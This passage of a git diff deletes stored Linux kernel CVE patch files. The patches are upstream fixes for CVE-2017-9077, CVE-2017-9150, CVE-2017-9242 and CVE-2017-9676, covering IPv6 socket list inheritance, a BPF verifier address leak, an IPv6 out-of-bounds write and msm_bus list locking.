-@@ -1131,6 +1132,7 @@ static struct sock *tcp_v6_syn_recv_sock(const struct sock *sk, struct sk_buff *
- 	   First: no IPv4 options.
- 	 */
- 	newinet->inet_opt = NULL;
-+	newnp->ipv6_mc_list = NULL;
- 	newnp->ipv6_ac_list = NULL;
- 	newnp->ipv6_fl_list = NULL;
- 
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-9077/^4.11/0001.patch b/Patches/Linux_CVEs/CVE-2017-9077/^4.11/0001.patch
deleted file mode 100644
index 828a8905..00000000
--- a/Patches/Linux_CVEs/CVE-2017-9077/^4.11/0001.patch
+++ /dev/null
@@ -1,64 +0,0 @@
-From 83eaddab4378db256d00d295bda6ca997cd13a52 Mon Sep 17 00:00:00 2001
-From: WANG Cong <xiyou.wangcong@gmail.com>
-Date: Tue, 9 May 2017 16:59:54 -0700
-Subject: ipv6/dccp: do not inherit ipv6_mc_list from parent
-
-Like commit 657831ffc38e ("dccp/tcp: do not inherit mc_list from parent")
-we should clear ipv6_mc_list etc. for IPv6 sockets too.
-
-Cc: Eric Dumazet <edumazet@google.com>
-Signed-off-by: Cong Wang <xiyou.wangcong@gmail.com>
-Acked-by: Eric Dumazet <edumazet@google.com>
-Signed-off-by: David S. Miller <davem@davemloft.net>
----
- net/dccp/ipv6.c     | 6 ++++++
- net/ipv6/tcp_ipv6.c | 2 ++
- 2 files changed, 8 insertions(+)
-
-diff --git a/net/dccp/ipv6.c b/net/dccp/ipv6.c
-index d9b6a4e..b6bbb71 100644
---- a/net/dccp/ipv6.c
-+++ b/net/dccp/ipv6.c
-@@ -426,6 +426,9 @@ static struct sock *dccp_v6_request_recv_sock(const struct sock *sk,
- 		newsk->sk_backlog_rcv = dccp_v4_do_rcv;
- 		newnp->pktoptions  = NULL;
- 		newnp->opt	   = NULL;
-+		newnp->ipv6_mc_list = NULL;
-+		newnp->ipv6_ac_list = NULL;
-+		newnp->ipv6_fl_list = NULL;
- 		newnp->mcast_oif   = inet6_iif(skb);
- 		newnp->mcast_hops  = ipv6_hdr(skb)->hop_limit;
- 
-@@ -490,6 +493,9 @@ static struct sock *dccp_v6_request_recv_sock(const struct sock *sk,
- 	/* Clone RX bits */
- 	newnp->rxopt.all = np->rxopt.all;
- 
-+	newnp->ipv6_mc_list = NULL;
-+	newnp->ipv6_ac_list = NULL;
-+	newnp->ipv6_fl_list = NULL;
- 	newnp->pktoptions = NULL;
- 	newnp->opt	  = NULL;
- 	newnp->mcast_oif  = inet6_iif(skb);
-diff --git a/net/ipv6/tcp_ipv6.c b/net/ipv6/tcp_ipv6.c
-index aeb9497..df5a9ff 100644
---- a/net/ipv6/tcp_ipv6.c
-+++ b/net/ipv6/tcp_ipv6.c
-@@ -1062,6 +1062,7 @@ static struct sock *tcp_v6_syn_recv_sock(const struct sock *sk, struct sk_buff *
- 		newtp->af_specific = &tcp_sock_ipv6_mapped_specific;
- #endif
- 
-+		newnp->ipv6_mc_list = NULL;
- 		newnp->ipv6_ac_list = NULL;
- 		newnp->ipv6_fl_list = NULL;
- 		newnp->pktoptions  = NULL;
-@@ -1131,6 +1132,7 @@ static struct sock *tcp_v6_syn_recv_sock(const struct sock *sk, struct sk_buff *
- 	   First: no IPv4 options.
- 	 */
- 	newinet->inet_opt = NULL;
-+	newnp->ipv6_mc_list = NULL;
- 	newnp->ipv6_ac_list = NULL;
- 	newnp->ipv6_fl_list = NULL;
- 
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-9150/^4.11/0001.patch b/Patches/Linux_CVEs/CVE-2017-9150/^4.11/0001.patch
deleted file mode 100644
index aac6bc7c..00000000
--- a/Patches/Linux_CVEs/CVE-2017-9150/^4.11/0001.patch
+++ /dev/null
@@ -1,78 +0,0 @@
-From 0d0e57697f162da4aa218b5feafe614fb666db07 Mon Sep 17 00:00:00 2001
-From: Daniel Borkmann <daniel@iogearbox.net>
-Date: Mon, 8 May 2017 00:04:09 +0200
-Subject: bpf: don't let ldimm64 leak map addresses on unprivileged
-
-The patch fixes two things at once:
-
-1) It checks the env->allow_ptr_leaks and only prints the map address to
-   the log if we have the privileges to do so, otherwise it just dumps 0
-   as we would when kptr_restrict is enabled on %pK. Given the latter is
-   off by default and not every distro sets it, I don't want to rely on
-   this, hence the 0 by default for unprivileged.
-
-2) Printing of ldimm64 in the verifier log is currently broken in that
-   we don't print the full immediate, but only the 32 bit part of the
-   first insn part for ldimm64. Thus, fix this up as well; it's okay to
-   access, since we verified all ldimm64 earlier already (including just
-   constants) through replace_map_fd_with_map_ptr().
-
-Fixes: 1be7f75d1668 ("bpf: enable non-root eBPF programs")
-Fixes: cbd357008604 ("bpf: verifier (add ability to receive verification log)")
-Reported-by: Jann Horn <jannh@google.com>
-Signed-off-by: Daniel Borkmann <daniel@iogearbox.net>
-Acked-by: Alexei Starovoitov <ast@kernel.org>
-Signed-off-by: David S. Miller <davem@davemloft.net>
----
- kernel/bpf/verifier.c | 21 ++++++++++++++++-----
- 1 file changed, 16 insertions(+), 5 deletions(-)
-
-diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c
-index c2ff608..c5b56c9 100644
---- a/kernel/bpf/verifier.c
-+++ b/kernel/bpf/verifier.c
-@@ -298,7 +298,8 @@ static const char *const bpf_jmp_string[16] = {
- 	[BPF_EXIT >> 4] = "exit",
- };
- 
--static void print_bpf_insn(struct bpf_insn *insn)
-+static void print_bpf_insn(const struct bpf_verifier_env *env,
-+			   const struct bpf_insn *insn)
- {
- 	u8 class = BPF_CLASS(insn->code);
- 
-@@ -362,9 +363,19 @@ static void print_bpf_insn(struct bpf_insn *insn)
- 				insn->code,
- 				bpf_ldst_string[BPF_SIZE(insn->code) >> 3],
- 				insn->src_reg, insn->imm);
--		} else if (BPF_MODE(insn->code) == BPF_IMM) {
--			verbose("(%02x) r%d = 0x%x\n",
--				insn->code, insn->dst_reg, insn->imm);
-+		} else if (BPF_MODE(insn->code) == BPF_IMM &&
-+			   BPF_SIZE(insn->code) == BPF_DW) {
-+			/* At this point, we already made sure that the second
-+			 * part of the ldimm64 insn is accessible.
-+			 */
-+			u64 imm = ((u64)(insn + 1)->imm << 32) | (u32)insn->imm;
-+			bool map_ptr = insn->src_reg == BPF_PSEUDO_MAP_FD;
-+
-+			if (map_ptr && !env->allow_ptr_leaks)
-+				imm = 0;
-+
-+			verbose("(%02x) r%d = 0x%llx\n", insn->code,
-+				insn->dst_reg, (unsigned long long)imm);
- 		} else {
- 			verbose("BUG_ld_%02x\n", insn->code);
- 			return;
-@@ -2853,7 +2864,7 @@ static int do_check(struct bpf_verifier_env *env)
- 
- 		if (log_level) {
- 			verbose("%d: ", insn_idx);
--			print_bpf_insn(insn);
-+			print_bpf_insn(env, insn);
- 		}
- 
- 		err = ext_analyzer_insn_hook(env, insn_idx, prev_insn_idx);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-9242/^4.11/0001.patch b/Patches/Linux_CVEs/CVE-2017-9242/^4.11/0001.patch
deleted file mode 100644
index 247b5b64..00000000
--- a/Patches/Linux_CVEs/CVE-2017-9242/^4.11/0001.patch
+++ /dev/null
@@ -1,63 +0,0 @@
-From 232cd35d0804cc241eb887bb8d4d9b3b9881c64a Mon Sep 17 00:00:00 2001
-From: Eric Dumazet <edumazet@google.com>
-Date: Fri, 19 May 2017 14:17:48 -0700
-Subject: [PATCH] ipv6: fix out of bound writes in __ip6_append_data()
-
-Andrey Konovalov and idaifish@gmail.com reported crashes caused by
-one skb shared_info being overwritten from __ip6_append_data()
-
-Andrey program lead to following state :
-
-copy -4200 datalen 2000 fraglen 2040
-maxfraglen 2040 alloclen 2048 transhdrlen 0 offset 0 fraggap 6200
-
-The skb_copy_and_csum_bits(skb_prev, maxfraglen, data + transhdrlen,
-fraggap, 0); is overwriting skb->head and skb_shared_info
-
-Since we apparently detect this rare condition too late, move the
-code earlier to even avoid allocating skb and risking crashes.
-
-Once again, many thanks to Andrey and syzkaller team.
-
-Signed-off-by: Eric Dumazet <edumazet@google.com>
-Reported-by: Andrey Konovalov <andreyknvl@google.com>
-Tested-by: Andrey Konovalov <andreyknvl@google.com>
-Reported-by: <idaifish@gmail.com>
-Signed-off-by: David S. Miller <davem@davemloft.net>
----
- net/ipv6/ip6_output.c | 15 ++++++++-------
- 1 file changed, 8 insertions(+), 7 deletions(-)
-
-diff --git a/net/ipv6/ip6_output.c b/net/ipv6/ip6_output.c
-index d4a31becbd25d..bf8a58a1c32d8 100644
---- a/net/ipv6/ip6_output.c
-+++ b/net/ipv6/ip6_output.c
-@@ -1466,6 +1466,11 @@ static int __ip6_append_data(struct sock *sk,
- 			 */
- 			alloclen += sizeof(struct frag_hdr);
- 
-+			copy = datalen - transhdrlen - fraggap;
-+			if (copy < 0) {
-+				err = -EINVAL;
-+				goto error;
-+			}
- 			if (transhdrlen) {
- 				skb = sock_alloc_send_skb(sk,
- 						alloclen + hh_len,
-@@ -1515,13 +1520,9 @@ static int __ip6_append_data(struct sock *sk,
- 				data += fraggap;
- 				pskb_trim_unique(skb_prev, maxfraglen);
- 			}
--			copy = datalen - transhdrlen - fraggap;
--
--			if (copy < 0) {
--				err = -EINVAL;
--				kfree_skb(skb);
--				goto error;
--			} else if (copy > 0 && getfrag(from, data + transhdrlen, offset, copy, fraggap, skb) < 0) {
-+			if (copy > 0 &&
-+			    getfrag(from, data + transhdrlen, offset,
-+				    copy, fraggap, skb) < 0) {
- 				err = -EFAULT;
- 				kfree_skb(skb);
- 				goto error;
diff --git a/Patches/Linux_CVEs/CVE-2017-9676/3.0+/0001.patch b/Patches/Linux_CVEs/CVE-2017-9676/3.0+/0001.patch
deleted file mode 100644
index 44facbac..00000000
--- a/Patches/Linux_CVEs/CVE-2017-9676/3.0+/0001.patch
+++ /dev/null
@@ -1,272 +0,0 @@
-From d109d8d7e2998a635406215a559e298fa7ef4bb8 Mon Sep 17 00:00:00 2001
-From: "lianwei.wang" <lian-wei.wang@motorola.com>
-Date: Fri, 30 Mar 2012 12:05:50 +0800
-Subject: [PATCH] IKHSS7-18791 msm:fix the list usage in msm_bus_dbg
-
-The list usage in msm_bus_dbg driver are not correct which will cause
-kernel panic.
-  . The list operation should be protected by a lock, e.g. mutex_lock.
-  . The list entry should only be operated on a valid entry.
-
-Change-Id: I19efeb346d1bacf129ccfd7a6511bc795c029afc
-Signed-off-by: Lianwei Wang <lian-wei.wang@motorola.com>
-Reviewed-on: http://gerrit.pcs.mot.com/384275
-Reviewed-by: Guo-Jian Chen <A21757@motorola.com>
-Reviewed-by: Ke Lv <a2435c@motorola.com>
-Tested-by: Jira Key <JIRAKEY@motorola.com>
-Reviewed-by: Jeffrey Carlyle <jeff.carlyle@motorola.com>
-Reviewed-by: Check Patch <CHEKPACH@motorola.com>
-Reviewed-by: Klocwork kwcheck <klocwork-kwcheck@sourceforge.mot.com>
-Reviewed-by: Tao Hu <taohu@motorola.com>
----
- arch/arm/mach-msm/msm_bus/msm_bus_dbg.c | 74 ++++++++++++++++++++++++++-------
- 1 file changed, 58 insertions(+), 16 deletions(-)
-
-diff --git a/arch/arm/mach-msm/msm_bus/msm_bus_dbg.c b/arch/arm/mach-msm/msm_bus/msm_bus_dbg.c
-index abd986bca68..76173529d35 100644
---- a/arch/arm/mach-msm/msm_bus/msm_bus_dbg.c
-+++ b/arch/arm/mach-msm/msm_bus/msm_bus_dbg.c
-@@ -28,6 +28,7 @@
- static struct dentry *clients;
- static struct dentry *dir;
- static DEFINE_MUTEX(msm_bus_dbg_fablist_lock);
-+static DEFINE_MUTEX(msm_bus_dbg_cllist_lock);
- struct msm_bus_dbg_state {
- 	uint32_t cl;
- 	uint8_t enable;
-@@ -271,16 +272,21 @@ static ssize_t client_data_read(struct file *file, char __user *buf,
- 	size_t count, loff_t *ppos)
- {
- 	int bsize = 0;
-+	ssize_t read_count = 0;
- 	uint32_t cl = (uint32_t)file->private_data;
- 	struct msm_bus_cldata *cldata = NULL;
- 
-+	mutex_lock(&msm_bus_dbg_cllist_lock);
- 	list_for_each_entry(cldata, &cl_list, list) {
--		if (cldata->clid == cl)
-+		if (cldata->clid == cl) {
-+			bsize = cldata->size;
-+			read_count = simple_read_from_buffer(buf, count, ppos,
-+						cldata->buffer, bsize);
- 			break;
-+		}
- 	}
--	bsize = cldata->size;
--	return simple_read_from_buffer(buf, count, ppos,
--		cldata->buffer, bsize);
-+	mutex_unlock(&msm_bus_dbg_cllist_lock);
-+	return read_count;
- }
- 
- static int client_data_open(struct inode *inode, struct file *file)
-@@ -310,9 +316,11 @@ static int msm_bus_dbg_record_client(const struct msm_bus_scale_pdata *pdata,
- {
- 	struct msm_bus_cldata *cldata;
- 
-+	mutex_lock(&msm_bus_dbg_cllist_lock);
- 	cldata = kmalloc(sizeof(struct msm_bus_cldata), GFP_KERNEL);
- 	if (!cldata) {
- 		MSM_BUS_DBG("Failed to allocate memory for client data\n");
-+		mutex_unlock(&msm_bus_dbg_cllist_lock);
- 		return -ENOMEM;
- 	}
- 	cldata->pdata = pdata;
-@@ -321,6 +329,7 @@ static int msm_bus_dbg_record_client(const struct msm_bus_scale_pdata *pdata,
- 	cldata->file = file;
- 	cldata->size = 0;
- 	list_add_tail(&cldata->list, &cl_list);
-+	mutex_unlock(&msm_bus_dbg_cllist_lock);
- 	return 0;
- }
- 
-@@ -328,6 +337,7 @@ static void msm_bus_dbg_free_client(uint32_t clid)
- {
- 	struct msm_bus_cldata *cldata = NULL;
- 
-+	mutex_lock(&msm_bus_dbg_cllist_lock);
- 	list_for_each_entry(cldata, &cl_list, list) {
- 		if (cldata->clid == clid) {
- 			debugfs_remove(cldata->file);
-@@ -336,23 +346,34 @@ static void msm_bus_dbg_free_client(uint32_t clid)
- 			break;
- 		}
- 	}
-+	mutex_unlock(&msm_bus_dbg_cllist_lock);
- }
- 
- static int msm_bus_dbg_fill_cl_buffer(const struct msm_bus_scale_pdata *pdata,
- 	int index, uint32_t clid)
- {
--	int i = 0, j;
-+	int i = 0, j, found = 0;
- 	char *buf = NULL;
- 	struct msm_bus_cldata *cldata = NULL;
- 	struct timespec ts;
- 
-+	mutex_lock(&msm_bus_dbg_cllist_lock);
- 	list_for_each_entry(cldata, &cl_list, list) {
--		if (cldata->clid == clid)
-+		if (cldata->clid == clid) {
-+			found = 1;
- 			break;
-+		}
-+	}
-+
-+	if (!found) {
-+		MSM_BUS_DBG("Client(clid=%d) doesn't exist\n", clid);
-+		mutex_unlock(&msm_bus_dbg_cllist_lock);
-+		return -EINVAL;
- 	}
- 	if (cldata->file == NULL) {
- 		if (pdata->name == NULL) {
- 			MSM_BUS_DBG("Client doesn't have a name\n");
-+			mutex_unlock(&msm_bus_dbg_cllist_lock);
- 			return -EINVAL;
- 		}
- 		cldata->file = msm_bus_dbg_create(pdata->name, S_IRUGO,
-@@ -390,6 +411,9 @@ static int msm_bus_dbg_fill_cl_buffer(const struct msm_bus_scale_pdata *pdata,
- 	i += scnprintf(buf + i, MAX_BUFF_SIZE - i, "\n");
- 
- 	cldata->size = i;
-+
-+	mutex_unlock(&msm_bus_dbg_cllist_lock);
-+
- 	return i;
- }
- 
-@@ -426,6 +450,7 @@ static ssize_t  msm_bus_dbg_update_request_write(struct file *file,
- 	chid = buf;
- 	MSM_BUS_DBG("buffer: %s\n size: %d\n", buf, sizeof(ubuf));
- 
-+	mutex_lock(&msm_bus_dbg_cllist_lock);
- 	list_for_each_entry(cldata, &cl_list, list) {
- 		if (strstr(chid, cldata->pdata->name)) {
- 			cldata = cldata;
-@@ -435,16 +460,19 @@ static ssize_t  msm_bus_dbg_update_request_write(struct file *file,
- 				if (ret) {
- 					MSM_BUS_DBG("Index conversion"
- 						" failed\n");
-+					mutex_unlock(&msm_bus_dbg_cllist_lock);
- 					return -EFAULT;
- 				}
- 			} else
- 				MSM_BUS_DBG("Error parsing input. Index not"
- 					" found\n");
-+			msm_bus_dbg_update_request(cldata, index);
- 			break;
- 		}
- 	}
- 
--	msm_bus_dbg_update_request(cldata, index);
-+	mutex_unlock(&msm_bus_dbg_cllist_lock);
-+
- 	kfree(buf);
- 	return cnt;
- }
-@@ -458,17 +486,18 @@ static ssize_t fabric_data_read(struct file *file, char __user *buf,
- {
- 	struct msm_bus_fab_list *fablist = NULL;
- 	int bsize = 0;
--	ssize_t ret;
-+	ssize_t ret = 0;
- 	const char *name = file->private_data;
- 
- 	mutex_lock(&msm_bus_dbg_fablist_lock);
- 	list_for_each_entry(fablist, &fabdata_list, list) {
--		if (strcmp(fablist->name, name) == 0)
-+		if (strcmp(fablist->name, name) == 0) {
-+			bsize = fablist->size;
-+			ret = simple_read_from_buffer(buf, count, ppos,
-+				fablist->buffer, bsize);
- 			break;
-+		}
- 	}
--	bsize = fablist->size;
--	ret = simple_read_from_buffer(buf, count, ppos,
--		fablist->buffer, bsize);
- 	mutex_unlock(&msm_bus_dbg_fablist_lock);
- 	return ret;
- }
-@@ -519,16 +548,25 @@ static int msm_bus_dbg_fill_fab_buffer(const char *fabname,
- 	void *cdata, int nmasters, int nslaves,
- 	int ntslaves)
- {
--	int i;
-+	int i, found = 0;
- 	char *buf = NULL;
- 	struct msm_bus_fab_list *fablist = NULL;
- 	struct timespec ts;
- 
- 	mutex_lock(&msm_bus_dbg_fablist_lock);
- 	list_for_each_entry(fablist, &fabdata_list, list) {
--		if (strcmp(fablist->name, fabname) == 0)
-+		if (strcmp(fablist->name, fabname) == 0) {
-+			found = 1;
- 			break;
-+		}
-+	}
-+
-+	if (!found) {
-+		MSM_BUS_DBG("Fabric dbg entry %s does not exist, fabname\n");
-+		mutex_unlock(&msm_bus_dbg_fablist_lock);
-+		return -EINVAL;
- 	}
-+
- 	if (fablist->file == NULL) {
- 		MSM_BUS_DBG("Fabric dbg entry does not exist\n");
- 		mutex_unlock(&msm_bus_dbg_fablist_lock);
-@@ -542,7 +580,6 @@ static int msm_bus_dbg_fill_fab_buffer(const char *fabname,
- 		fablist->size = 0;
- 	}
- 	buf = fablist->buffer;
--	mutex_unlock(&msm_bus_dbg_fablist_lock);
- 	ts = ktime_to_timespec(ktime_get());
- 	i += scnprintf(buf + i, MAX_BUFF_SIZE - i, "\n%d.%d\n",
- 		(int)ts.tv_sec, (int)ts.tv_nsec);
-@@ -550,7 +587,6 @@ static int msm_bus_dbg_fill_fab_buffer(const char *fabname,
- 	msm_bus_rpm_fill_cdata_buffer(&i, buf + i, MAX_BUFF_SIZE, cdata,
- 		nmasters, nslaves, ntslaves);
- 	i += scnprintf(buf + i, MAX_BUFF_SIZE - i, "\n");
--	mutex_lock(&msm_bus_dbg_fablist_lock);
- 	fablist->size = i;
- 	mutex_unlock(&msm_bus_dbg_fablist_lock);
- 	return 0;
-@@ -660,6 +696,7 @@ static int __init msm_bus_debugfs_init(void)
- 		clients, NULL, &msm_bus_dbg_update_request_fops) == NULL)
- 		goto err;
- 
-+	mutex_lock(&msm_bus_dbg_cllist_lock);
- 	list_for_each_entry(cldata, &cl_list, list) {
- 		if (cldata->pdata->name == NULL) {
- 			MSM_BUS_DBG("Client name not found\n");
-@@ -668,6 +705,7 @@ static int __init msm_bus_debugfs_init(void)
- 		cldata->file = msm_bus_dbg_create(cldata->
- 			pdata->name, S_IRUGO, clients, cldata->clid);
- 	}
-+	mutex_unlock(&msm_bus_dbg_cllist_lock);
- 
- 	mutex_lock(&msm_bus_dbg_fablist_lock);
- 	list_for_each_entry(fablist, &fabdata_list, list) {
-@@ -675,6 +713,7 @@ static int __init msm_bus_debugfs_init(void)
- 			commit, (void *)fablist->name, &fabric_data_fops);
- 		if (fablist->file == NULL) {
- 			MSM_BUS_DBG("Cannot create files for commit data\n");
-+			mutex_unlock(&msm_bus_dbg_fablist_lock);
- 			goto err;
- 		}
- 	}
-@@ -694,10 +733,13 @@ static void __exit msm_bus_dbg_teardown(void)
- 	struct msm_bus_cldata *cldata = NULL, *cldata_temp;
- 
- 	debugfs_remove_recursive(dir);
-+	mutex_lock(&msm_bus_dbg_cllist_lock);
- 	list_for_each_entry_safe(cldata, cldata_temp, &cl_list, list) {
- 		list_del(&cldata->list);
- 		kfree(cldata);
- 	}
-+	mutex_unlock(&msm_bus_dbg_cllist_lock);
-+
- 	mutex_lock(&msm_bus_dbg_fablist_lock);
- 	list_for_each_entry_safe(fablist, fablist_temp, &fabdata_list, list) {
- 		list_del(&fablist->list);
diff --git a/Patches/Linux_CVEs/CVE-2017-9676/3.18/0002.patch b/Patches/Linux_CVEs/CVE-2017-9676/3.18/0002.patch
deleted file mode 100644
index a63b017b..00000000
--- a/Patches/Linux_CVEs/CVE-2017-9676/3.18/0002.patch
+++ /dev/null
@@ -1,347 +0,0 @@
-From c1f749639030305a3b02185c180240a8195fb715 Mon Sep 17 00:00:00 2001
-From: Maria Yu <aiquny@codeaurora.org>
-Date: Fri, 21 Apr 2017 16:06:14 +0800
-Subject: soc: qcom: msm_bus: add mutex lock for cllist data
-
-Cldata needed to be protected by lock since crash
-happened when synchronous update and free.
-
-CRs-Fixed: 2034222
-Change-Id: Ied86461b784d69d9758dc3fc793a8a0de86e7f9c
-Signed-off-by: Maria Yu <aiquny@codeaurora.org>
----
- drivers/platform/msm/msm_bus/msm_bus_dbg.c | 102 +++++++++++++++++++++--------
- 1 file changed, 76 insertions(+), 26 deletions(-)
-
-diff --git a/drivers/platform/msm/msm_bus/msm_bus_dbg.c b/drivers/platform/msm/msm_bus/msm_bus_dbg.c
-index 88ba186..8db3a62 100644
---- a/drivers/platform/msm/msm_bus/msm_bus_dbg.c
-+++ b/drivers/platform/msm/msm_bus/msm_bus_dbg.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2010-2012, 2014-2015, The Linux Foundation. All rights
-+/* Copyright (c) 2010-2012, 2014-2015, 2017 The Linux Foundation. All rights
-  * reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-@@ -38,6 +38,7 @@
- static struct dentry *clients;
- static struct dentry *dir;
- static DEFINE_MUTEX(msm_bus_dbg_fablist_lock);
-+static DEFINE_RT_MUTEX(msm_bus_dbg_cllist_lock);
- struct msm_bus_dbg_state {
- 	uint32_t cl;
- 	uint8_t enable;
-@@ -289,7 +290,9 @@ static ssize_t client_data_read(struct file *file, char __user *buf,
- 	struct msm_bus_cldata *cldata = NULL;
- 	const struct msm_bus_client_handle *handle = file->private_data;
- 	int found = 0;
-+	ssize_t ret;
- 
-+	rt_mutex_lock(&msm_bus_dbg_cllist_lock);
- 	list_for_each_entry(cldata, &cl_list, list) {
- 		if ((cldata->clid == cl) ||
- 			(cldata->handle && (cldata->handle == handle))) {
-@@ -298,12 +301,17 @@ static ssize_t client_data_read(struct file *file, char __user *buf,
- 		}
- 	}
- 
--	if (!found)
-+	if (!found) {
-+		rt_mutex_unlock(&msm_bus_dbg_cllist_lock);
- 		return 0;
-+	}
- 
- 	bsize = cldata->size;
--	return simple_read_from_buffer(buf, count, ppos,
-+	ret = simple_read_from_buffer(buf, count, ppos,
- 		cldata->buffer, bsize);
-+	rt_mutex_unlock(&msm_bus_dbg_cllist_lock);
-+
-+	return ret;
- }
- 
- static int client_data_open(struct inode *inode, struct file *file)
-@@ -339,7 +347,9 @@ int msm_bus_dbg_add_client(const struct msm_bus_client_handle *pdata)
- 		return -ENOMEM;
- 	}
- 	cldata->handle = pdata;
-+	rt_mutex_lock(&msm_bus_dbg_cllist_lock);
- 	list_add_tail(&cldata->list, &cl_list);
-+	rt_mutex_unlock(&msm_bus_dbg_cllist_lock);
- 	return 0;
- }
- 
-@@ -352,6 +362,7 @@ int msm_bus_dbg_rec_transaction(const struct msm_bus_client_handle *pdata,
- 	bool found = false;
- 	char *buf = NULL;
- 
-+	rt_mutex_lock(&msm_bus_dbg_cllist_lock);
- 	list_for_each_entry(cldata, &cl_list, list) {
- 		if (cldata->handle == pdata) {
- 			found = true;
-@@ -359,12 +370,15 @@ int msm_bus_dbg_rec_transaction(const struct msm_bus_client_handle *pdata,
- 		}
- 	}
- 
--	if (!found)
-+	if (!found) {
-+		rt_mutex_unlock(&msm_bus_dbg_cllist_lock);
- 		return -ENOENT;
-+	}
- 
- 	if (cldata->file == NULL) {
- 		if (pdata->name == NULL) {
- 			MSM_BUS_DBG("Client doesn't have a name\n");
-+			rt_mutex_unlock(&msm_bus_dbg_cllist_lock);
- 			return -EINVAL;
- 		}
- 		cldata->file = debugfs_create_file(pdata->name, S_IRUGO,
-@@ -393,6 +407,7 @@ int msm_bus_dbg_rec_transaction(const struct msm_bus_client_handle *pdata,
- 	i += scnprintf(buf + i, MAX_BUFF_SIZE - i, "%llu  ", ib);
- 	i += scnprintf(buf + i, MAX_BUFF_SIZE - i, "\n");
- 	cldata->size = i;
-+	rt_mutex_unlock(&msm_bus_dbg_cllist_lock);
- 
- 	trace_bus_update_request((int)ts.tv_sec, (int)ts.tv_nsec,
- 		pdata->name, pdata->mas, pdata->slv, ab, ib);
-@@ -404,6 +419,7 @@ void msm_bus_dbg_remove_client(const struct msm_bus_client_handle *pdata)
- {
- 	struct msm_bus_cldata *cldata = NULL;
- 
-+	rt_mutex_lock(&msm_bus_dbg_cllist_lock);
- 	list_for_each_entry(cldata, &cl_list, list) {
- 		if (cldata->handle == pdata) {
- 			debugfs_remove(cldata->file);
-@@ -412,6 +428,7 @@ void msm_bus_dbg_remove_client(const struct msm_bus_client_handle *pdata)
- 			break;
- 		}
- 	}
-+	rt_mutex_unlock(&msm_bus_dbg_cllist_lock);
- }
- 
- static int msm_bus_dbg_record_client(const struct msm_bus_scale_pdata *pdata,
-@@ -429,7 +446,9 @@ static int msm_bus_dbg_record_client(const struct msm_bus_scale_pdata *pdata,
- 	cldata->clid = clid;
- 	cldata->file = file;
- 	cldata->size = 0;
-+	rt_mutex_lock(&msm_bus_dbg_cllist_lock);
- 	list_add_tail(&cldata->list, &cl_list);
-+	rt_mutex_unlock(&msm_bus_dbg_cllist_lock);
- 	return 0;
- }
- 
-@@ -437,6 +456,7 @@ static void msm_bus_dbg_free_client(uint32_t clid)
- {
- 	struct msm_bus_cldata *cldata = NULL;
- 
-+	rt_mutex_lock(&msm_bus_dbg_cllist_lock);
- 	list_for_each_entry(cldata, &cl_list, list) {
- 		if (cldata->clid == clid) {
- 			debugfs_remove(cldata->file);
-@@ -445,6 +465,7 @@ static void msm_bus_dbg_free_client(uint32_t clid)
- 			break;
- 		}
- 	}
-+	rt_mutex_unlock(&msm_bus_dbg_cllist_lock);
- }
- 
- static int msm_bus_dbg_fill_cl_buffer(const struct msm_bus_scale_pdata *pdata,
-@@ -456,6 +477,7 @@ static int msm_bus_dbg_fill_cl_buffer(const struct msm_bus_scale_pdata *pdata,
- 	struct timespec ts;
- 	int found = 0;
- 
-+	rt_mutex_lock(&msm_bus_dbg_cllist_lock);
- 	list_for_each_entry(cldata, &cl_list, list) {
- 		if (cldata->clid == clid) {
- 			found = 1;
-@@ -463,11 +485,14 @@ static int msm_bus_dbg_fill_cl_buffer(const struct msm_bus_scale_pdata *pdata,
- 		}
- 	}
- 
--	if (!found)
-+	if (!found) {
-+		rt_mutex_unlock(&msm_bus_dbg_cllist_lock);
- 		return -ENOENT;
-+	}
- 
- 	if (cldata->file == NULL) {
- 		if (pdata->name == NULL) {
-+			rt_mutex_unlock(&msm_bus_dbg_cllist_lock);
- 			MSM_BUS_DBG("Client doesn't have a name\n");
- 			return -EINVAL;
- 		}
-@@ -515,19 +540,9 @@ static int msm_bus_dbg_fill_cl_buffer(const struct msm_bus_scale_pdata *pdata,
- 
- 	cldata->index = index;
- 	cldata->size = i;
--	return i;
--}
--
--static int msm_bus_dbg_update_request(struct msm_bus_cldata *cldata, int index)
--{
--	int ret = 0;
-+	rt_mutex_unlock(&msm_bus_dbg_cllist_lock);
- 
--	if ((index < 0) || (index > cldata->pdata->num_usecases)) {
--		MSM_BUS_DBG("Invalid index!\n");
--		return -EINVAL;
--	}
--	ret = msm_bus_scale_client_update_request(cldata->clid, index);
--	return ret;
-+	return i;
- }
- 
- static ssize_t  msm_bus_dbg_update_request_write(struct file *file,
-@@ -539,19 +554,26 @@ static ssize_t  msm_bus_dbg_update_request_write(struct file *file,
- 	char *chid;
- 	char *buf = kmalloc((sizeof(char) * (cnt + 1)), GFP_KERNEL);
- 	int found = 0;
-+	uint32_t clid;
-+	ssize_t res = cnt;
- 
- 	if (!buf || IS_ERR(buf)) {
- 		MSM_BUS_ERR("Memory allocation for buffer failed\n");
- 		return -ENOMEM;
- 	}
--	if (cnt == 0)
--		return 0;
--	if (copy_from_user(buf, ubuf, cnt))
--		return -EFAULT;
-+	if (cnt == 0) {
-+		res = 0;
-+		goto out;
-+	}
-+	if (copy_from_user(buf, ubuf, cnt)) {
-+		res = -EFAULT;
-+		goto out;
-+	}
- 	buf[cnt] = '\0';
- 	chid = buf;
- 	MSM_BUS_DBG("buffer: %s\n size: %zu\n", buf, sizeof(ubuf));
- 
-+	rt_mutex_lock(&msm_bus_dbg_cllist_lock);
- 	list_for_each_entry(cldata, &cl_list, list) {
- 		if (strnstr(chid, cldata->pdata->name, cnt)) {
- 			found = 1;
-@@ -562,21 +584,35 @@ static ssize_t  msm_bus_dbg_update_request_write(struct file *file,
- 				if (ret) {
- 					MSM_BUS_DBG("Index conversion"
- 						" failed\n");
--					return -EFAULT;
-+					rt_mutex_unlock(
-+						&msm_bus_dbg_cllist_lock);
-+					res = -EFAULT;
-+					goto out;
- 				}
- 			} else {
- 				MSM_BUS_DBG("Error parsing input. Index not"
- 					" found\n");
- 				found = 0;
- 			}
-+			if ((index < 0) ||
-+					(index > cldata->pdata->num_usecases)) {
-+				MSM_BUS_DBG("Invalid index!\n");
-+				rt_mutex_unlock(&msm_bus_dbg_cllist_lock);
